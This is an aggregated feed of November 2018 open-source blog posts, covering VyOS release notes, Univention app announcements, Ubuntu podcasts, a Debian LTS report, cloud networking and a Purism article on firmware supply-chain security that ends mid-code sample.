November 18, 2018


Ubuntu developers

Tiago Carrondo: S01E11 – Alta Coltura

This week the wonder trio turned its attention to reading suggestions, technical and otherwise, because life is not just podcasts… News from the SolusOS world, the partnership between Canonical and Samsung, and the Linux on Dex project, not forgetting the Festa do Software Livre da Moita 2018, which is just around the corner! You know the drill: listen, subscribe and share!


This episode was produced and edited by Alexandre Carrapiço (Thunderclaws Studios – sound recording, production, editing, mixing and mastering). Contact: thunderclawstudiosPT–arroba–

Attribution and licenses

The theme music is “Won’t see it comin’ (Feat Aequality & N’sorte d’autruche)” by Alpha Hydrae, licensed under the CC0 1.0 Universal License.

This episode is licensed under Attribution-NonCommercial-NoDerivatives 4.0 International (CC BY-NC-ND 4.0); the full text of the license can be read here. We are open to licensing other kinds of use – contact us for validation and authorization.

18 November, 2018 11:32PM

November 17, 2018

VyOS


VyOS 1.2.0-rc7 is available for download

Yet another release candidate, with more bug fixes and some experimental features. We are grateful to everyone who reported these bugs and sent us patches for them!

The ISO image is available for download here  

New features

RADIUS client source IP in remote access VPN

It is now possible to set the source IP with a command like "set vpn l2tp remote-access authentication radius source-address".
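In configuration mode that might look like the following sketch (the source address is of course a placeholder; only the quoted command itself is taken from the release notes):

```shell
configure
set vpn l2tp remote-access authentication radius source-address 192.0.2.10
commit
save
```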

UEFI support

Thanks to the joint efforts of our contributor Kroy the Rabbit and the maintainers, VyOS has gained experimental support for installation and booting on UEFI platforms.

Since UEFI-only machines have lately started to enter the market, this makes a perfect last-minute addition, but like any big change it needs testing. If you have hardware that uses UEFI, please try it out and let us know whether it works well for you.

If your machine boots with UEFI, the installer will detect it automatically and create a GPT partition table and an EFI partition rather than an MBR layout, so for users this new feature should be seamless.
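The detection itself is typically nothing more than a check for the UEFI directory in sysfs. A minimal sketch of that logic (an illustration, not VyOS's actual installer code):

```python
import os

def firmware_type(sysfs_root="/sys"):
    # On Linux, /sys/firmware/efi only exists when the kernel was booted
    # via UEFI; installers commonly branch on this to pick GPT + EFI system
    # partition vs. a classic MBR layout.
    if os.path.isdir(os.path.join(sysfs_root, "firmware", "efi")):
        return "uefi"
    return "bios"
```

An installer would then choose a GPT layout with an EFI system partition for "uefi" and an MBR partition table otherwise.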

Bug fixes

Updates to the latest kernel and the latest FRR seem to have resolved a number of tasks on their own, namely: an issue with route-map interface close not working for all protocols (T524), packet loss in some Xen environments, including AWS (T935), and support for the Denverton SoC (T946).

Fixes in BGP commands

Thanks to our community, we have identified a few more BGP commands whose migration to the new "address-family ipv4-unicast" syntax was incomplete. IPv4 prefix lists should now work correctly (T968), and so should "soft-reconfiguration inbound" (T982).
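Under the new syntax, per-neighbor address-family options hang off the "address-family ipv4-unicast" node. A hedged sketch of what that looks like (AS numbers and neighbor addresses are placeholders):

```shell
configure
set protocols bgp 64512 neighbor 192.0.2.1 remote-as 64513
set protocols bgp 64512 neighbor 192.0.2.1 address-family ipv4-unicast soft-reconfiguration inbound
commit
```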

FRR syntax changes

While FRR has brought us a lot of improvements, it also has a small number of incompatibilities.

A syntax change in the "as-path-exclude" route-map option made it impossible to delete the clause or entire route-map, until we fixed it (T991). 

Another change is only planned, but it already produces deprecation warnings that are quite annoying (T964). We have fixed most of them, except in the "policy community-list" commands. The final bit is blocked by an issue in the new FRR commands that are supposed to replace the old ones, so until that is fixed you will get a warning when deleting or modifying community-lists. The warning is harmless, and we will fix it and update the op mode commands once the FRR developers fix their part.


A couple of issues with the wireguard CLI have been fixed. One was that you could not use whitespace inside wireguard interface descriptions (T979). The other would leave the VyOS CLI and the actual wireguard configuration in an inconsistent state (T965). Thanks to our contributor hagbard, both issues have been resolved.


Removing a user with the "delete system login user" command now correctly deletes the home directory, eliminating the possibility that the same home directory is reassigned to a new user with a different UID, leaving that user without write permissions to their own home directory (T740).

Authentication/authorization logs should now work as expected again (T963).

The installer now allows installation on NVM Express SSD devices /dev/nvme* (T967). The patch was contributed by Brooks Swinnerton.

The "run monitor bandwidth-test initiate" command works again (T994).

The "| strip-private" pipe now correctly obscures "pre-shared-secret" options (T999).
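Conceptually, a filter like strip-private just rewrites the value that follows sensitive options before output is shared. A rough Python illustration of that idea (not the actual VyOS implementation; the keyword list is illustrative):

```python
import re

# Options whose arguments must never appear in shared configs (illustrative list)
SENSITIVE = ("pre-shared-secret", "password", "community")

def strip_private(line):
    # Replace the argument following any sensitive keyword with a placeholder
    pattern = r"\b(" + "|".join(SENSITIVE) + r")\s+\S+"
    return re.sub(pattern, r"\1 xxxxxx", line)

print(strip_private("set vpn ipsec site-to-site peer 203.0.113.1 authentication pre-shared-secret hunter2"))
# → set vpn ipsec site-to-site peer 203.0.113.1 authentication pre-shared-secret xxxxxx
```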

The "hostfile-update" DHCP server option should now work again (T976).

17 November, 2018 06:23PM by Yuriy Andamasov

November 16, 2018


Univention Corporate Server

Systematic Approach to Evaluate Software for Your Business

With its many solutions, the Univention App Center offers you a multitude of choices. However, the easiest solution to find is not always the perfect fit.

Let me walk you through a step-by-step process for finding the optimal solution for your business, and show which aspects of a software product you should examine in particular.

Our handy feature checklist for software evaluation

Today, any software has countless features, big and small. Few of them are essential, some are important, and many fall into the unneeded or nice-to-have category. Working out which features are critical to your network thus becomes the task that can make or break the acceptance of the solution among your users.

To support you in this important process, we have created a handy software evaluation checklist for you to download. It helps you evaluate all features and cross-match them with the solutions in question, and it sorts the functions into different categories depending on who requested them. Furthermore, we created an example list for groupware in a medical clinic; feel free to look at it. I will use this example to explain the different categories.

Screenshot of a software evaluation checklist for groupware as an example

Classifying core software features

The first thing you need to look at is the set of functions the software needs to fulfill. If we look at a groupware solution, there are three features the software must have: it needs to send e-mails, synchronize contacts, and manage calendars. Secondary functions might be chat and data shares.

These are the core features; without them, the software would be useless. However, not all core features of each solution may be critical for the software to fulfill its purpose. Sorting them into multiple categories by their importance to you is the essence of classifying the software.
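In code form, such a classification is just a list of features tagged with a category and a must-have flag. A hypothetical sketch for the groupware example (feature names taken from the text, the data layout is an assumption):

```python
# Hypothetical checklist entries: (feature, category, must_have)
checklist = [
    ("send e-mail",          "core",      True),
    ("synchronize contacts", "core",      True),
    ("manage calendars",     "core",      True),
    ("chat",                 "secondary", False),
    ("data shares",          "secondary", False),
]

def meets_must_haves(solution_features, checklist):
    # A solution is only viable if every must-have feature is present
    return all(f in solution_features for f, _, must in checklist if must)
```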

Usability: How to meet users’ needs and wants

The most critical features come from your users: if a solution is not useful or usable for the end users, they will in all likelihood not choose to use it. However, outright asking them what the features should be will probably not be a great success either.

In many cases, a user will focus more on the visual experience than on their actual wants and needs. “The user interface should be sky blue with iPhone-like buttons” is as likely an answer as “We need to be able to upload receipts to the accounting system.”

Watch the users going through their current workflow

A better way is to have the users walk you through their current and preferred workflow. Take note of where they click and what actions they execute, and look out especially for activities they perform twice. Observing the workflow is critical: users often accept problems simply because they have always been there. Finding these hidden inconveniences, such as entering information twice or being required to authenticate instead of using single sign-on, gives you the chance to make a user's life more comfortable. In the end, fixing these hidden annoyances will significantly reduce the perceived inconvenience of learning a new system.

In our example, the features the users mentioned were mobile phone compatibility and group e-mail accounts. At the same time, we observed that the users were most frustrated by having to enter their password and by the complex creation of sorting rules in the current system. All four of these features are consequently part of the evaluation.

Important features to consider for administrators

The second most important aspect is convenience for the administrators. Most important is that the software integrates as much as possible with the other solutions in your software stack: nothing is more error-prone than having to create the same user with the same user name, full name, and e-mail address over and over again.

Likewise, the administrators will have substantial headaches if they need to manage numerous different password policies. Making sure that multiple independent systems comply with your requirements can be extremely challenging, not to speak of finding out which password to reset when a user cannot log in. Consequently, we recommend making the integration of the new system with the existing IT infrastructure part of the requirements.

Update and patch management is another issue you should consider an administrative requirement. That includes the operating system and the servers on which the system will run. Especially if the underlying system is entirely different from anything else used in the company so far, you should carefully consider the cost of maintenance.

In our example, the system needed to integrate with UCS’ user and mail management. The admins expressed a strong preference for a solution that can be installed right out of the UCS App Center and thus integrates into the patch management. Another wish was integration into their Nagios monitoring system.

Legal and Business Requirements

Lastly, you need to look at the legal and business requirements. One of the most frequently mentioned requirements is whether support is available. Other questions you might want to consider are whether the system is open source and whether any training is available.

The last line in our example is left for you to fill out: the price of the software, both the cost of the initial installation and the yearly cost for support and maintenance.

Going with our example, we had specific requirements for logging and cloud integration. There was also a strong wish to have the users use two-factor authentication.

Final step in the software evaluation process

Based on these costs and the number of requirements fulfilled, the spreadsheet calculates a score of met requirements per euro or dollar paid. Thus you can quickly see the value you get for your money. It also warns you if the software in question does not fulfil all of your must-haves.
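The spreadsheet's calculation boils down to a simple ratio, zeroed out when a must-have is missing. A hypothetical re-implementation of that idea (the function and its exact behavior are assumptions, not the checklist's actual formula):

```python
def value_score(requirements_met, must_haves_met, total_cost):
    # Met requirements per euro (or dollar) paid; a missing must-have
    # disqualifies the solution regardless of price.
    if not must_haves_met or total_cost <= 0:
        return 0.0
    return requirements_met / total_cost

# A solution meeting 8 requirements for 400 EUR/year scores 0.02 per euro;
# a cheaper rival missing a must-have scores 0 and drops out.
```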


Our experience is that a systematic approach to evaluating new software is essential to making a well-thought-out decision. It takes emotion and name recognition out of the question and focuses on the actual needs and requirements, both of users and of admins. When you apply such an approach, you can move forward with a purchase in confidence.

We hope this process, including our example, helps you make good decisions about future software purchases. If you have any feedback or questions, please comment below.

Visit our App Catalog and try our tips!


Der Beitrag Systematic Approach to Evaluate Software for Your Business erschien zuerst auf Univention.

16 November, 2018 02:17PM by Kevin Dominik Korte

November 15, 2018


Ubuntu developers

Robert Ancell: Counting Code in GNOME Settings

I've been spending a bit of time recently working on GNOME Settings. One part of this has been bringing some of the older panel code up to modern standards, one of which is making use of GtkBuilder templates.

I wondered if any of these changes would show in the stats, so I wrote a program to analyse each branch in the git repository and break down the code between C and GtkBuilder. The results were graphed in Google Sheets:

This is just the user accounts panel, which shows some of the reduction in C code and increase in GtkBuilder data:

Here's the breakdown of which panels make up the codebase:

I don't think this draws any major conclusions, but is still interesting to see. Of note:
  • Some of the changes made in 3.28 did reduce the total amount of code! But it was quickly gobbled up by the new Thunderbolt panel.
  • Network and Printers are the dominant panels - look at all that code!
  • I ignored empty lines in the files in case differing coding styles would make some panels look bigger or smaller. It didn't seem to make a significant difference.
  • You can see a reduction in C code looking at individual panels that have been updated, but overall it gets lost in the total amount of code.
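A per-extension, blank-line-ignoring counter of the kind described is only a few lines. A rough sketch (not Robert's actual program, which also walks every branch in the git repository):

```python
from pathlib import Path

def count_code(root):
    # Count non-empty lines of C (.c/.h) and GtkBuilder (.ui) files under root,
    # ignoring blank lines so coding style doesn't skew the totals.
    counts = {"c": 0, "gtkbuilder": 0}
    kinds = {".c": "c", ".h": "c", ".ui": "gtkbuilder"}
    for path in Path(root).rglob("*"):
        kind = kinds.get(path.suffix)
        if kind and path.is_file():
            text = path.read_text(errors="ignore")
            counts[kind] += sum(1 for line in text.splitlines() if line.strip())
    return counts
```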
I'll have another look in a few cycles when more changes have landed (I'm working on a new sound panel at the moment).

15 November, 2018 08:05PM by Robert Ancell

Cumulus Linux

The Benefits of Flexible Multi-Cloud and Multi-Region Networking

A report recently published by 451 Research shows that almost 70% of all enterprises will be using a multi-cloud or hybrid IT infrastructure within a year. As more and more enterprises are drawn to the cloud, companies that have already adopted it are now choosing multi-cloud or hybrid architectures for their IT requirements.

The report also showed that about 60% of all workloads are expected to run on some form of hosted cloud service by 2019, up from about 45% in 2017. This marks an impressive shift from DIY owned-and-operated services to cloud or third-party hosted IT services. The future of IT services is clearly hybrid and multi-cloud.

Here we explore some of the reasons multi-cloud is a fantastic idea for enterprises when they consider security, flexibility, reliability, and cost-effectiveness.

Reduce Security Risks Like a DDoS Attack

A Distributed Denial of Service (DDoS) attack is when a number of different computer systems attack a server, website, network resource, or cloud hosting unit. A DDoS attack can be executed by a lone individual or by a nation state.

In a scenario where your company’s website is powered by resources hosted on a single cloud, a well-executed DDoS attack can take down your website and also thwart any attempts to restore it. According to a recent study by Rand Group, 98% of businesses surveyed said that just one hour of downtime costs their company upwards of $100,000.

Using a hybrid-cloud architecture to power your website helps ensure that your company’s services remain resilient against DDoS and similar attacks. Adding a private cloud to your public cloud setup allows a supplementary or backup cloud to pick up the load if one cloud service is attacked.

Better Disaster Recovery Options

For a web architect, a Single Point of Failure (SPOF) is their worst nightmare. SPOF events can occur through machine error or malicious attacks by hackers.

The common way web architects counter SPOFs is redundancy. But what happens if the host system itself goes offline? In these cases, using a multi-region architecture to host different components of a system creates the ultimate form of redundancy by leaving fewer SPOFs. Many third-party vendors offer multi-region disaster recovery plans for your AWS or Azure storage; popular disaster recovery vendors include N2WS, Acronis, and Druva.
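The redundancy argument can be made concrete with a back-of-the-envelope calculation: assuming regions fail independently, the whole service is only down when every region is down at once. The numbers below are illustrative, not from the report:

```python
def full_outage_probability(per_region_outage, regions):
    # Independent failures assumed; a total outage requires
    # all regions to be down simultaneously.
    return per_region_outage ** regions

# With a 1% chance of any single region being down, two independent regions
# take the chance of a total outage down to 0.01 * 0.01 = 0.0001 (0.01%).
```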

Security – Keep Sensitive Operations in Private Cloud

There is a popular argument that network security can be compromised in a public cloud environment: since the data doesn’t reside on your infrastructure, you have less control over who really has access to it. With a private cloud system, you have much more control over data security. By design, hybrid clouds can inherit the security properties of a private cloud, and you can ensure that sensitive data remains protected by keeping it in your own infrastructure. You can deploy workload-heavy tasks to a public cloud and limit sensitive operations to your private cloud.

Moreover, with hybrid-cloud you have the flexibility to explore different cloud service providers, leverage the full extent of your private cloud and find the best match for each part of your business requirement.

Cost Optimization Performance

Given that every company has a financial bottom line to keep to, and considering the rate at which emerging technologies are advancing, for most enterprises this has evolved into a need-versus-price model of business.

A vast number of cloud service providers make their mark by providing a set of services in tune with your business needs. You can look at leveraging these services along with your private cloud network for optimum business efficiency. That said, you also need to look at the financial implications of system downtime and how much it can cost your business in terms of capital expenditure.

The important factor is to narrow down and identify the cloud service providers whose offerings are among the best in their peer group. The key lies in identifying the right combination of providers that matches your business needs, complements your private cloud setup, and gives you a financial edge over your competitors. An added boost of productivity and efficiency, coupled with a decent reduction in cost, bodes well for enterprises and businesses across the globe.

Avoid Vendor Lock-Ins

As businesses grow and diversify, their systems and support also need to expand to keep pace with the larger customer base. There will come a time when your local private cloud servers can no longer meet your requirements and you will need the help of a cloud service provider. Once you identify a provider, you need to ensure that the new system fits conveniently with your private cloud setup with minimum hindrance to your daily operations.

Consider a scenario where your business needs outgrow what your first cloud service provider can offer, or where you find a better deal for a portion of your business with a different provider. In either scenario, diversifying your service providers makes for a good business decision.

By restricting yourself to only one cloud service provider, you make it both time-consuming and expensive to transfer your systems elsewhere. This leaves you having to accept any pricing changes or agreement restructuring, as you are locked into a contract to do business with them.

Region-Based Business Policies

A large number of countries have far stricter data privacy rules and regulations governing an enterprise’s multi-cloud strategy. Having a multi-pronged cloud strategy helps take care of a number of different governmental regulations, whether within a single country or globally.


The market for cloud computing as a service grew by about 27% in 2017 compared to 2016, generating revenue of approximately $28 billion. That revenue is expected to reach $53.3 billion by 2021. As an increasing number of enterprises move to a cloud infrastructure, they’ll be looking for more options to get the best of all worlds.

That’s where hybrid-cloud and multi-region networking kick in. In this post, we’ve covered some of the top reasons why using multiple cloud hosts is an exciting idea. What are your thoughts on multi-cloud? Share them in the comments below.

The post The Benefits of Flexible Multi-Cloud and Multi-Region Networking appeared first on Cumulus Networks engineering blog.

15 November, 2018 04:00PM by David Varnum


Ubuntu developers

Ubuntu Podcast from the UK LoCo: S11E36 – Thirty-Six Hours

This week we’ve been resizing partitions. We interview Andrew Katz and discuss open source and the law, bring you a command line love and go over all your feedback.

It’s Season 11 Episode 36 of the Ubuntu Podcast! Alan Pope, Mark Johnson and Martin Wimpress are connected and speaking to your brain.

In this week’s show:

  • Command line love: hub, a wrapper that adds GitHub features to git. Install it with "snap install hub", then try "hub ci-status", "hub issue", "hub pr", "hub sync" and "hub pull-request".
  • And we go over all your amazing feedback – thanks for sending it – please keep sending it!

  • Image credit: Greyson Joralemon

That’s all for this week! You can listen to the Ubuntu Podcast back catalogue on YouTube. If there’s a topic you’d like us to discuss, or you have any feedback on previous shows, please send us your comments and suggestions, Tweet us, or comment on our Facebook page, our Google+ page, or our sub-Reddit.

15 November, 2018 03:00PM

Raphaël Hertzog: Freexian’s report about Debian Long Term Support, October 2018

Like each month, here comes a report about the work of paid contributors to Debian LTS.

Individual reports

In October, about 209 work hours have been dispatched among 13 paid contributors. Their reports are available:

  • Abhijith PA did 1 hour (out of 10 hours allocated + 4 extra hours, thus keeping 13 extra hours for November).
  • Antoine Beaupré did 24 hours (out of 24 hours allocated).
  • Ben Hutchings did 19 hours (out of 15 hours allocated + 4 extra hours).
  • Chris Lamb did 18 hours (out of 18 hours allocated).
  • Emilio Pozuelo Monfort did 12 hours (out of 30 hours allocated + 29.25 extra hours, thus keeping 47.25 extra hours for November).
  • Holger Levsen did 1 hour (out of 8 hours allocated + 19.5 extra hours, but he gave back the remaining hours due to his new role, see below).
  • Hugo Lefeuvre did 10 hours (out of 10 hours allocated).
  • Markus Koschany did 30 hours (out of 30 hours allocated).
  • Mike Gabriel did 4 hours (out of 8 hours allocated, thus keeping 4 extra hours for November).
  • Ola Lundqvist did 4 hours (out of 8 hours allocated + 8 extra hours, but gave back 4 hours, thus keeping 8 extra hours for November).
  • Roberto C. Sanchez did 15.5 hours (out of 18 hours allocated, thus keeping 2.5 extra hours for November).
  • Santiago Ruano Rincón did 10 hours (out of 28 extra hours, thus keeping 18 extra hours for November).
  • Thorsten Alteholz did 30 hours (out of 30 hours allocated).
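The bookkeeping behind each bullet is simple arithmetic: hours not worked this month (minus anything given back) carry over to the next. A small sketch, checked against a few of the entries above:

```python
def carried_over(allocated, extra, done, given_back=0):
    # Hours available this month, minus hours worked and hours returned
    return allocated + extra - done - given_back

assert carried_over(10, 4, 1) == 13               # Abhijith PA
assert carried_over(30, 29.25, 12) == 47.25       # Emilio Pozuelo Monfort
assert carried_over(8, 0, 4) == 4                 # Mike Gabriel
assert carried_over(8, 8, 4, given_back=4) == 8   # Ola Lundqvist
assert carried_over(18, 0, 15.5) == 2.5           # Roberto C. Sanchez
```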

Evolution of the situation

In November we are welcoming Brian May and Lucas Kanashiro back as contributors after they took some break from this work.

Holger Levsen is stepping down as LTS contributor but is taking over the role of LTS coordinator that was solely under the responsibility of Raphaël Hertzog up to now. Raphaël continues to handle the administrative side, but Holger will coordinate the LTS contributors ensuring that the work is done and that it is well done.

The number of sponsored hours increased to 212 hours per month, and we gained a new sponsor (who shall not be named, since they don’t want to be publicly listed).

The security tracker currently lists 27 packages with a known CVE and the dla-needed.txt file has 27 packages needing an update.

Thanks to our sponsors

New sponsors are in bold.


15 November, 2018 02:36PM

November 14, 2018


Univention Corporate Server

New in Univention App Center: Apple School Manager Connector

iPads in schools

The digitisation in schools that are equipped with UCS@school continues to progress rapidly. Many school authorities and federal states are providing schools with mobile terminals for use in the classroom. Apple’s iPads in particular are in demand. The devices are robust, easy to use and affordable. They are also equipped with a large number of special apps for digital education.

While iPads are usually tied to a single user, there is one exception for schools: the so-called shared iPads. Students authenticate themselves with their credentials and can thus access personal data, homework, apps, books, etc. This not only saves costs but, in combination with mobile device management, also a lot of time, as teachers can manage the contents centrally.

Apple School Manager and MDM solutions

A prerequisite for the use of shared iPads is their connection to the Apple School Manager. The responsible administrators manage the students’ user accounts, the devices and their contents via the manufacturer’s web portal. Apple’s Device Enrollment Program (DEP) facilitates the addition and initial configuration of new iPads. The purchase and distribution of apps and books can also be automated; the manufacturer calls this provisioning program the Volume Purchase Program (VPP).

An MDM (Mobile Device Management) system is required to use DEP and VPP. Such a mobile device management is recommended anyway if a larger number of tablets is in use; otherwise you would need to configure each device manually. An MDM system takes care of the software and the basic privacy-compliant settings of the iPads, integration with the school network, user accounts, classes, and more. The Apple School Manager provides an interface for MDM solutions such as ZuluDesk, FileWave and Relution – all available in the Univention App Center.

Interaction with the ASM Connector

There are two things you need to consider when using shared iPads: in addition to basic data protection questions (e.g. “What about personal data on the device?”, “Is telemetry data transferred?”), the responsible administrators are particularly keen on further automating the user administration. For this reason we developed the Apple School Manager Connector. It connects existing UCS@school installations with the Apple School Manager and fits perfectly into our vision for school IT infrastructure.

A typical application scenario looks as follows:


Graphic of a typical user scenario Apple School Manager Connector

iPads purchased by the school authority or the school are registered with the Apple School Manager via the Device Enrollment Program (DEP). The connector transfers user, class, and course data from the UCS@school instance to the ASM via SFTP, i.e. encrypted in transit – anonymized if desired. Our new app modifies the user data in such a way that it is not possible to attribute the data on an iPad to an individual user; the real names no longer end up in the ASM (and thus in the MDM). To increase user-friendliness, the user names can be made visible, which in turn needs to be assessed by the responsible data protection officer.
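The anonymization step can be pictured as deriving a stable pseudonym from each user name, so the same pupil always maps to the same opaque ID while the real name never leaves the school server. The scheme below is purely hypothetical, for illustration, and is not the connector's actual algorithm:

```python
import hashlib

def pseudonymize(username, school_salt):
    # Stable one-way pseudonym: the same input always yields the same ID,
    # but the real name cannot be recovered from it (hypothetical scheme).
    digest = hashlib.sha256((school_salt + ":" + username).encode()).hexdigest()
    return "user-" + digest[:12]
```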

Screenshot of Apple School Manager

The connector also ensures that the roles defined in UCS@school (students and teachers) are correctly transferred to the Apple School Manager. This provisioning of the user data is not a one-time action: After installing the connector from the Univention App Center, administrators can specify the synchronization interval in the settings. They can determine, for example, that the connector synchronizes the data once a day at a certain time.

MDM systems can then use this data to store profiles on the mobile devices. The connector is designed to work with all common mobile device management solutions, including those that are not available via the Univention App Center.

Improved data protection

When designing the Apple School Manager Connector, we placed great emphasis on data protection. We involved data protection officers from school authorities in the development. During the set up of the ASM Connector, those who are responsible decide for themselves which data should be anonymized.

Anonymization is activated by default in the ASM Connector.

For example, the new app can generate managed Apple IDs for the login and modify them accordingly. These managed Apple IDs are subject to restrictions; further information can be found on Apple’s support website. It may also be necessary to ensure that cloud services such as Apple’s iCloud are disabled via an MDM system.

For the classroom this still means that the results of each lesson must be saved to a file storage conforming to data protection regulations before the user logs off from the iPad. For this purpose, we recommend ownCloud or Nextcloud, both available from the Univention App Center. In the future, it will be possible to configure this online storage so that users can access it without a further time-consuming or error-prone login, the aim being to make access significantly easier for teachers and pupils.

The advantages of the UCS Apple School Manager Connector at a glance

  • Teachers or school administrators no longer have to manually register their students per school or per class in Apple School Manager: students and teaching staff are automatically registered as Apple users.
  • Synchronization of user accounts, classes, and courses can be done anonymously, so app vendors can’t use Apple IDs to identify individuals.
  • Schools can decide independently how they want to use iPads in a standardized way. If required, a school authority with a central IT infrastructure management can also operate multiple MDM systems.
  • The connector is available as an app in the App Center of UCS@school and can be installed with a few mouse clicks.
  • In its standard configuration, the Connector synchronizes all user accounts of the activated schools with the ASM every night. The same applies to schools, classes, work groups and users.
  • Univention recommends using one of the three MDM solutions from the Univention App Center, as they are already integrated into UCS@school and its identity management. However, MDMs that cannot be installed directly via UCS can also be connected to the new connector via standardized interfaces.

Apple School Manager Connector at the Univention Summit

At the Univention Summit on January 31 and February 1, 2019, we will be happy to show you how the Apple School Manager Connector works and what it can do for you. At this event you will also be meeting numerous technology partners who make their solutions available in the Univention App Center.

Register now for the event

Further information

  • UCS Apple School Manager Connector in the App Catalog
  • The source code of the Apple School Manager Connector on GitHub


Der Beitrag New in Univention App Center: Apple School Manager Connector erschien zuerst auf Univention.

14 November, 2018 01:19PM by Michel Smidt


Ubuntu developers

Tiago Carrondo: S01E10 – Tendência livre

This time with a guest, Luís Costa, we talked a lot about hardware, free hardware and, inevitably, Libretrend's new products, the brand-new Librebox. In a month full of events, the calendar deserved special attention, with updates on all the announced meetups and events! You know the drill: listen, subscribe and share!


This episode was produced and edited by Alexandre Carrapiço (Thunderclaws Studios – sound recording, production, editing, mixing and mastering). Contact: thunderclawstudiosPT–arroba–

Attribution and licenses

Cover image: richard ling on Visualhunt, licensed CC BY-NC-ND.

The theme music is “Won’t see it comin’ (Feat Aequality & N’sorte d’autruche)” by Alpha Hydrae, licensed under the CC0 1.0 Universal License.

This episode is licensed under Attribution-NonCommercial-NoDerivatives 4.0 International (CC BY-NC-ND 4.0); the full text of the license can be read here. We are open to licensing other kinds of use – contact us for validation and authorization.

14 November, 2018 02:02AM

November 13, 2018


Purism PureOS

Protecting the Digital Supply Chain

You first learn about the importance of the supply chain as a child. You discover a shiny object on the ground and as you reach down to pick it up your parent says “Don’t touch that! You don’t know where it’s been!” But why does it matter whether you know where it’s been? When your parents know where something came from, they can trust that it’s clean and safe for you to play with. When they don’t, their imagination runs wild with all of the disgusting bacteria and viruses that might taint it.

The food supply chain is important. Food is sealed not just so that it will keep longer, but also so that you can trust that no one has tampered with it between the time it left the supplier and the time it goes into your grocery bag. Some food goes even further and provides a tamper-evident seal that makes it obvious if someone else opened it before you. Again, the concern isn’t just about food freshness, or even someone stealing food from a package, it’s about the supplier protecting you from a malicious person who might go as far as poisoning the food.

The supply chain ultimately comes down to trust and your ability to audit that trust. You trust the grocery and the supplier to protect the food you buy, but you still check the expiry date and whether it’s been opened before you buy it. The grocery then trusts and audits their suppliers and so on down the line until you get to a farm that produces the raw materials that go into your food. Of course it doesn’t stop there. In the case of organic farming, the farmer is also audited for the processes they use to fertilize and remove pests in their crops, and in the case of livestock this even extends to the supply chain behind the food the livestock eats.

You deserve to know where things have been whether it’s the food that sustains your physical life or the devices and software that protect your digital life. Tainted food can make you sick or even kill you, and tainted devices can steal your data and take over your device to infect others. In this post I’ll describe some of the steps that Purism takes to protect the digital supply chain in our own products.

The Firmware Supply Chain

A lot has been written recently about threats to the hardware supply chain in light of Bloomberg’s allegations about hardware implants that intercepted the BMC remote management features in certain SuperMicro server hardware. While all of the vendors have denied these allegations (and Bloomberg stands by its story), everyone acknowledges that whether this particular incident happened, this kind of implant is certainly possible.

A crucial point that many are missing, and one that leads me personally to doubt the Bloomberg story, is that while a hardware implant is possible, it’s unnecessary: the BMC firmware and IPMI protocol have a long history of vulnerabilities, and it would be a lot easier (and stealthier) for an attacker either to take advantage of existing vulnerabilities or to flash malicious firmware than to risk a hardware implant. An attacker who is sophisticated enough to deploy a hardware implant is sophisticated enough to pick a safer approach.

Why is attacking the firmware safer than implanting hardware? First, firmware hacking is easier. Firmware used to be something that was flashed onto hardware once and could never be overwritten. In those days it might have been just as easy to add a malicious chip onto the motherboard. Now most firmware is loaded onto chips that can be written and overwritten multiple times to allow updates in the field, so anyone along the hardware supply chain could overwrite trusted firmware with their own.

Second, firmware attacks are harder to detect. Hardware attacks risk detection all along the supply chain whenever someone physically inspects the hardware. Motherboards have published diagrams you can compare hardware against, and if a chip is on the board that isn’t in a diagram, that raises alarms. Since so much firmware is closed, it’s more difficult to detect if someone added malicious code and it’s certainly something you can’t detect by visual inspection.

Finally, firmware attacks offer deniability. It’s hard for someone to explain away a malicious chip that’s added onto hardware unannounced. If firmware vulnerabilities are detected, they can almost always be explained away as a security bug or a developer mistake.

How Purism Protects the Firmware Supply Chain

Purism has a number of strategies it uses to protect the firmware supply chain. The first strategy is to limit the overall threat by reducing the amount of proprietary firmware on our hardware as much as possible. We select the hardware components in our laptops such as the graphics chip and WiFi card so that we can run them with free software drivers that anyone can audit. Like a dairy that only packages milk from antibiotic-free cows, we can avoid a lot of other audit worries by starting with a clean source.

The next area we focus on is the Intel Management Engine (ME). Like all modern Intel-based hardware, our laptops include the Intel Management Engine, but we intentionally exclude Intel’s Active Management Technology (AMT) to avoid the risk posed by that proprietary out-of-band management software. We then neutralize and disable the ME so that only a small percentage of the firmware remains on the chip, further reducing the avenues for attack. Whether a dairy gets antibiotic-free milk or not, it still pasteurizes it to kill any unseen microbes in the raw milk.

The other important piece of firmware on a laptop is the BIOS. Since it runs before the operating system, it’s a tempting piece of code to attack because such a compromise can easily hide from the OS in a regular system and survive reboots. We protect the BIOS firmware from supply chain attacks both upstream and downstream from us; next I will describe our approaches.

The motherboard’s BIOS chip arrives from the supplier with a proprietary BIOS. To protect against any upstream attempts to replace that default BIOS with something malicious, we overwrite it with our own coreboot BIOS. This further reduces the amount of proprietary firmware in the BIOS, since with coreboot the bulk of the BIOS is free software. Even though the proprietary Intel Firmware Support Package (FSP) blob remains, we greatly reduce the risk (and aim to liberate or replace the FSP as well). It’s like repackaging food in BPA-free plastic when you aren’t sure about the make-up of the original packaging.

That leaves how we protect you from attacks on the BIOS that might occur either during shipping or after you have the computer in your possession. For this we are working to offer the combination of the Heads tamper-evident BIOS that sits on top of coreboot and our Librem Key USB security token and we are starting a private beta program right now to get feedback before a wider release. With Heads combined with the Librem Key, we can configure a shared secret between the computer and the Librem Key at the factory and ship the devices separately. If someone tampers with your computer during shipping or at any point after you receive it, you will then be able to detect it with an easy “green is good, red is bad” blinking light on the Librem Key. Think of it like a pop-up tamper-evident seal on a jar of food.
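The shared-secret idea behind the tamper-evidence check can be illustrated with a toy challenge-response exchange. This is only a sketch, not Purism’s actual Heads/Librem Key protocol; the function names and message layout are invented for illustration.

```python
# Toy sketch of tamper-evidence via a factory-provisioned shared secret.
# NOT Purism's actual Heads/Librem Key protocol -- names and message
# layout here are invented for illustration only.
import hashlib
import hmac
import os

factory_secret = os.urandom(32)  # provisioned into BIOS and token at the factory

def measurement_response(secret: bytes, challenge: bytes, firmware_hash: bytes) -> bytes:
    """Answer a fresh challenge with an HMAC over the firmware measurement."""
    return hmac.new(secret, challenge + firmware_hash, hashlib.sha256).digest()

trusted_fw = hashlib.sha256(b"coreboot+Heads image").digest()
challenge = os.urandom(16)  # fresh nonce from the token, prevents replay

# The BIOS answers with what it actually measured; the token recomputes
# the expected answer from the secret and the known-good measurement.
bios_answer = measurement_response(factory_secret, challenge, trusted_fw)
token_expected = measurement_response(factory_secret, challenge, trusted_fw)
assert hmac.compare_digest(bios_answer, token_expected)  # green light: untampered

tampered_fw = hashlib.sha256(b"modified image").digest()
bad_answer = measurement_response(factory_secret, challenge, tampered_fw)
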